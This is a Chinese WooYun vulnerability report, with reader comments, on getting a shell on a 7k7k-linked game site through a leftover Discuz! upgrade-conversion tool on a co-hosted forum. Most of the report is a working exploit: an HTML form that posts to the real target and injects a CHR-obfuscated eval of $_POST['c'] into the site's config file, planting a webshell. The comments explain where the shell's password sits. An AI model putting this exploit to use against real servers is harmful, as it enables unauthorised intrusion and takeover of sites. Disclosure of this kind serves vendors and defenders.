当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053140

漏洞标题:奇客星空某站Getshell

相关厂商:youyouwin.com

漏洞作者: U神

提交时间:2014-03-10 16:43

修复时间:2014-04-24 16:43

公开时间:2014-04-24 16:43

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-10: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-24: 细节向公众公开

简要描述:

详细说明:

#1.被渗透的网站是“www.youyouwin.com”,标题:游戏共赢。首先来说一下我是如何确定这个网站是奇客星空旗下的.
①.其一这个网站是个小游戏的网站,和奇客星空是干同一行的;

0.jpg


②.其二这个游戏的底部信息标明了7K7K.com,如图:

01.jpg


③.其三我们点击【京网文[2010]0375-006】备案信息打开的是奇客星空!也成功的跳转到7k的备案页。

02.jpg


④.其四我们通过爱站查询一下,注册邮箱完全和7k7k一样,并且该邮箱下的域名都是奇客星空的!具体的关联的域名审核员自己看下,以上四点证据足以证明是奇客星空下的分站。

05.jpg


06.jpg


#2.以上完全证述了该站为奇客星空下的,那下面说说如何找到的,通过查看7k7k.com的C段看到这个站点的。

07.jpg


漏洞证明:

#3.该站同服下有一个站点http://www.hanhanlv.com是Discuz!的论坛,于是闲着没事就扫一下,结果扫到了这个东西![http://www.hanhanlv.com/utility/convert/index.php] 这个东西是可以写shell的,具体详情请厂商看

http://wooyun.org/bugs/wooyun-2010-045611


08.jpg


放上我们的EXP,Post的地址改成http://www.hanhanlv.com/utility/convert/index.php即可,直接保存设置:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Discuz! X 系列产品升级转换</title>
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<style type="text/css">
body,td { font-family: Tahoma; font-size: 12px; line-height: 150%;}
form {margin: 0px; padding: 0px;}
a:link,a:visited,a:active { color: #333333; text-decoration: none;}
a:hover {color: #FF0000;text-decoration: underline;}
.header {background-color: #ffffff; font-weight: bold; text-align: center}
.input, textarea {font-family: Tahoma;font-size: 12px;color: #333333;background-color: #ffffff;border: 1px solid #666666;padding-left:2px;}
.top {background-color: #cccccc}
.bg1 {background-color: #f8f8ff}
.bg2 {background-color: #fefeff}
.menu {background-color: #f5f5f5;}
.tableborder{background-color: #e5e5ff}
.title {background: #5086A5; font-weight: bold;color: #FFFFFF;}
.title td {background: #5086A5; font-weight: bold;color: #FFFFFF;}
.title, .title a:link, .title a:visited, .title a:active{color: #FFFFFF; text-decoration: none; font-weight: blod;}
.title a:hover{color: #00FF00;text-decoration: underline;}
.redbg {background: #FF0000; font-weight: bold; color: #FFFFFF;}
.redbg td {background: #FF0000; font-weight: bold; color: #FFFFFF;}
* {font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif; line-height: 1.5em; word-break: break-all; }
body { text-align:center; margin: 0; padding: 0; background: #F5FBFF; }
ul li { list-style: none; }
ul {margin: 0;}
.main{ margin: 40px auto 0; width:770px; text-align:left; border: solid #86B9D6; border-width: 5px 1px 1px; background: #FFF;}
.content{margin: 0pt auto; width: 95%;  min-height: 500px}
#ulist li {  float: left; margin-right: 5px; width: 30%; overflow: hidden; line-height: 2em; }
h1 { font-size: 18px; margin: 1px 0 0; line-height: 50px; height: 50px; background: #E8F7FC; color: #5086A5; padding-left: 10px; }
#menu {width: 100%; margin: 10px auto; text-align: center; }
#menu td { height: 30px; line-height: 30px; color: #999; border-bottom: 3px solid #EEE; }
.current { font-weight: bold; color: #090 !important; border-bottom-color: #F90 !important; }
.showtable { width:100%; border: solid; border-color:#86B9D6 #B2C9D3 #B2C9D3; border-width: 1px; margin: 10px auto; background: #F5FCFF; }
.showtable td { padding: 3px; color: #808080 }
.showtable strong { color: #5086A5; }
.datatable { width: 100%; margin: 10px auto 25px; }
.datatable td { padding: 5px 0; border-bottom: 1px solid #EEE; }
input { border: 1px solid #B2C9D3; padding: 2px; background: #F5FCFF; }
.button { margin: 10px auto 20px; width: 100%; }
.button td { text-align: center; }
.button input, .button button { border: solid; border-color:#F90; border-width: 1px 1px 3px; padding: 5px 40px; color: #090; background: #FFFAF0; cursor: pointer; }
#footer { font-size: 10px; line-height: 40px; background: #E8F7FC; text-align: center; height: 38px; overflow: hidden; color: #5086A5; margin-top: 20px; }
textarea, input, select{ padding:2px; border:1px solid; border-color:#666 #ccc #ccc #666; background:#F9F9F9; color:#333; }
.checkbox { border:0; background:none; }
</style>
<script type="text/javascript">
function redirect(url) {
	window.location.replace(url);
}
function checkAll(type, form, value, checkall, changestyle) {
	var checkall = checkall ? checkall : 'chkall';
	for(var i = 0; i < form.elements.length; i++) {
		var e = form.elements[i];
		if(type == 'option' && e.type == 'radio' && e.value == value && e.disabled != true) {
			e.checked = true;
		} else if(type == 'value' && e.type == 'checkbox' && e.getAttribute('chkvalue') == value) {
			e.checked = form.elements[checkall].checked;
		} else if(type == 'prefix' && e.name && e.name != checkall && (!value || (value && e.name.match(value)))) {
			e.checked = form.elements[checkall].checked;
			if(changestyle && e.parentNode && e.parentNode.tagName.toLowerCase() == 'li') {
				e.parentNode.className = e.checked ? 'checked' : '';
			}
		}
	}
}
</script>
</head>
<body style="table-layout:fixed; word-break:break-all; margin-top: 4px;">
<div class="main">
<h1>Discuz! X 系列产品升级/转换 向导  (<span style="color: #888888; padding: 4px">Discuz! 7.2 --&gt; Discuz! X2.0</span>)</h1>
<div class="content">
<table id="menu">
	<tr>
	<td >1.选择产品转换程序 </td>
	<td class="current">2.设置服务器信息 </td>
	<td >3.配置转换过程 </td>
	<td >4.执行数据转换 </td>
	<td >5.转换完成 </td>
	</tr>
</table>
<table class="showtable">
	<tbody><tr><td class="bg1"><strong>技巧提示</strong></td></tr>
		<tr><td class="bg2"><ol>如果无法显示设置项目,请删除文件 data/config.inc.php</ol>
		</td></tr>
	</tbody>
</table><form method="post" action="http://www.hanhanlv.com/utility/convert/index.php">
<input type="hidden" name="a" value="config">
<input type="hidden" name="source" value="d7.2_x2.0">
<input type="hidden" name="submit" value="yes"><div class="tableborder" style="margin: auto;">
	<table width="100%" border="0" cellpadding="4" cellspacing="1" align="center">
<tr class="header title"><td colspan="3">数据源服务器设置 (原始版本的数据库)</td>
</tr>
<tr class="bg1"><td width="150">数据库服务器</td><tr class="bg1"><td width="150">数据库服务器</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][dbhost]" value="localhost"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<td class="bg2"><input type="text" size="40" name="newconfig[aaa
eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]" value="localhost"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据库用户名</td>
<td class="bg2"><input type="text" size="40" name="newconfig[source][dbuser]" value="root"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据库密码</td>
<td class="bg2"><input type="text" size="40" name="newconfig[source][dbpw]" value=""></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据库</td>
<td class="bg2"><input type="text" size="40" name="newconfig[source][dbname]" value="discuz"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据表前缀</td>
<td class="bg2"><input type="text" size="40" name="newconfig[source][tablepre]" value="cdb_"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据表字符集 (可选)</td>
<td class="bg2"><input type="text" size="40" name="newconfig[source][dbcharset]" value=""></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">持久连接</td>
<td class="bg2"><input type="text" size="40" name="newconfig[source][pconnect]" value="1"></td>
<td class="bg2"><font color="red">注意:如果源数据库与目标数据库在同一服务器,该项必须设置为0,否则设置为1</font><font color="red"></font></td>
</tr>
	</table></div>
<br><div class="tableborder" style="margin: auto;">
	<table width="100%" border="0" cellpadding="4" cellspacing="1" align="center">
<tr class="header title"><td colspan="3">目标服务器设置 (已正确安装 Discuz! X 的数据库)</td>
</tr>
<tr class="bg2"><td colspan="3"><font color="red">注意:目标数据库的数据将会被替换或者更新,如当中含有重要内容,请先备份</font></td>
</tr>
<tr class="bg1"><td width="150">数据库服务器</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][dbhost]" value="localhost"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据库用户名</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][dbuser]" value="root"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据库密码</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][dbpw]" value=""></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据库</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][dbname]" value="discuzx"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据表前缀</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][tablepre]" value="pre_"></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">数据表字符集 (可选)</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][dbcharset]" value=""></td>
<td class="bg2"><font color="red"></font><font color="red"></font></td>
</tr>
<tr class="bg1"><td width="150">持久连接</td>
<td class="bg2"><input type="text" size="40" name="newconfig[target][pconnect]" value="1"></td>
<td class="bg2"><font color="red">注意:如果源数据库与目标数据库在同一服务器,该项必须设置为0,否则设置为1</font><font color="red"></font></td>
</tr>
	</table></div>
<br><table class="button">
	<tr><td><input type="submit" value="保存服务器设置" name="submit"></td></tr>
</table></form>	</div>
	<div id="footer">&copy; Comsenz Inc. 2001-2010 www.discuz.net</div>
	</div>
</body>
</html>


接着连接我们的一句话地址:

1.1.jpg


#4.看到我们刚才的那个站了吧~

2.1.jpg


挂个测试页证明一下

11.jpg


PS:数据库神马的我就不透露了,不做有违背白帽子的道德的事情!建议厂商使用完dz转换工具之后可以删除该目录,以免被骇客恶意使用侵入!第二次合作,另外感谢厂商给高分!

修复方案:

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-10 18:16

厂商回复:

感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-09 08:30 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @Finger @疯狗 啊啊~为何这个要走小厂商

  2. 2014-03-10 18:20 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @youyouwin.com 不谢,请做好安全管理!裤子神马的没有动!请自查log,感谢您的及时确认!

  3. 2014-04-29 18:18 | 马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)

    20RANK 我的眼睛

  4. 2014-05-10 15:45 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    就是菜刀连接那里不太懂!

  5. 2014-05-10 19:55 | 马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)

    @浅兮 DZ的升级插件漏洞 不谢 不用给我WB

  6. 2014-05-10 21:51 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    @马丁 我知道啊!但是别人是大马他是菜刀!

  7. 2014-05-11 19:32 | 马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)

    @浅兮 大马?别闹...

  8. 2014-05-11 19:34 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    @马丁 是啊,文本上说的,反正能菜刀连接,那密码和一句话地址在哪里!

  9. 2014-05-11 19:56 | 马丁 ( 路人 | Rank:27 漏洞数:23 | 大爷~给口饭吧。)

    @浅兮 eval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]" value="localhost"></td> 密码在这里面 链接地址是配置文件 肯定是删掉了啊 你有什么想法?

  10. 2014-05-11 20:37 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    @马丁 哦!